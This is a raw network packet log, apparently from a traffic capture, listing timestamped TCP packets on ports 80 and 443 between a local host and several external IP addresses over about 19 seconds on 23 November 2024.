                                                                                                                                                                                                Nov 23, 2024 16:53:33.090430021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.090447903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.090476036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.107489109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.279742002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.279773951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.279787064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.279798985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.279819965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.279844046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280059099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280095100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280107975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280155897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280672073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280715942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.280749083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:33.334443092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:33.401777029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:35.726172924 CET8049724217.20.59.34192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:35.726277113 CET4972480192.168.2.4217.20.59.34
                                                                                                                                                                                                Nov 23, 2024 16:53:35.726453066 CET4972480192.168.2.4217.20.59.34
                                                                                                                                                                                                Nov 23, 2024 16:53:35.847318888 CET8049724217.20.59.34192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:41.081448078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:42.841617107 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:42.841664076 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:42.841727018 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:42.842180967 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:42.842197895 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:43.952516079 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:43.952544928 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:43.952817917 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:43.954698086 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:43.954715014 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:44.615233898 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:44.615572929 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:44.615595102 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:44.617094994 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:44.617176056 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:44.618520021 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:44.618602037 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:44.664721966 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:44.664738894 CET44349756142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:44.710314989 CET49756443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:53:45.389264107 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.389343977 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.393404007 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.393426895 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.393762112 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.448309898 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.451186895 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.491336107 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.779005051 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:45.779038906 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.779175043 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:45.779474020 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:45.779490948 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916328907 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916409969 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916528940 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916528940 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916548014 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916580915 CET49759443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.916587114 CET4434975923.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.951273918 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.951358080 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:45.951492071 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.951723099 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:45.951756001 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096641064 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096668959 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096822023 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:46.096998930 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:46.097013950 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.380532980 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.380615950 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:47.382042885 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:47.382050991 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.382282019 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.383475065 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:47.431334019 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.642246008 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.642451048 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:47.642462015 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.643327951 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.643387079 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:47.644321918 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:47.644376040 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.644491911 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:47.644499063 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.684330940 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:47.912480116 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.912543058 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.912657976 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:47.913914919 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:47.913922071 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:47.913957119 CET49766443192.168.2.423.204.130.19
                                                                                                                                                                                                Nov 23, 2024 16:53:47.913964033 CET4434976623.204.130.19192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.134463072 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.134836912 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.134845018 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.136495113 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.136986971 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.137603045 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.137603045 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.137690067 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162518978 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162535906 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162569046 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162604094 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162638903 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162647963 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162682056 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162717104 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162717104 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.162786007 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.183480024 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.183486938 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.228168011 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.357810020 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.357839108 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.357939005 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.357939005 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.357975006 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.362387896 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.571845055 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.571855068 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.571898937 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.571969986 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.571969986 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.572035074 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.572241068 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.622004986 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.622033119 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.622133970 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.622134924 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.622198105 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.622281075 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.642957926 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.642985106 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.642995119 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643018961 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643029928 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643043041 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643049955 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643055916 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643112898 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.643112898 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.651115894 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.666376114 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.666392088 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.666507006 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.666575909 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.666712999 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.693140984 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.717782974 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.717797041 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.718034983 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.718096972 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.723509073 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.762639999 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.762655020 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.762757063 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.762819052 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.762876034 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.800597906 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.800614119 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.800678968 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.800697088 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.800731897 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.800756931 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.842735052 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.842750072 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.842829943 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.842844009 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.842904091 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851701021 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851715088 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851736069 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851744890 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851763010 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851773024 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851794004 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.851816893 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.860549927 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.860564947 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.860631943 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.860661030 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.860847950 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.875783920 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.875799894 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.875869989 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.875883102 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.876051903 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.894395113 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.894407988 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.894459963 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.894474983 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.894515038 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.894515038 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898695946 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898705959 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898727894 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898756981 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898761034 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898783922 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.898814917 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.906589031 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.906627893 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.906647921 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.906677961 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.906724930 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.907071114 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.907099009 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.934129953 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.934201002 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.934206963 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.934243917 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.934251070 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:48.934314966 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.937241077 CET49767443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:48.937247992 CET4434976713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:49.136590004 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:49.136611938 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:49.136717081 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:49.136918068 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:49.136934996 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:49.402884007 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:49.402929068 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:49.402992010 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:49.403311014 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:49.403330088 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.065732956 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.070075989 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.070089102 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.071544886 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.071619034 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.072098970 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.072185040 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.072294950 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.114366055 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.114373922 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.165059090 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.282267094 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.282557964 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.282623053 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.284111977 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.284198999 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.284548044 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.284636021 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.284729004 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.329956055 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.329977989 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.377722025 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.585994005 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586059093 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586078882 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586117983 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586128950 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586137056 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586155891 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586169004 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586188078 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586201906 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586208105 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.586246014 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754553080 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754580021 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754622936 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754661083 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754707098 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754734993 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.754803896 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786576033 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786611080 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786649942 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786667109 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786674976 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786683083 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786714077 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786788940 CET4434977413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786854029 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.786854029 CET49774443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.790587902 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.790633917 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.790668964 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.790679932 CET4434977313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:51.790704012 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.790718079 CET49773443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:53:51.931137085 CET4434977313.107.246.63192.168.2.4
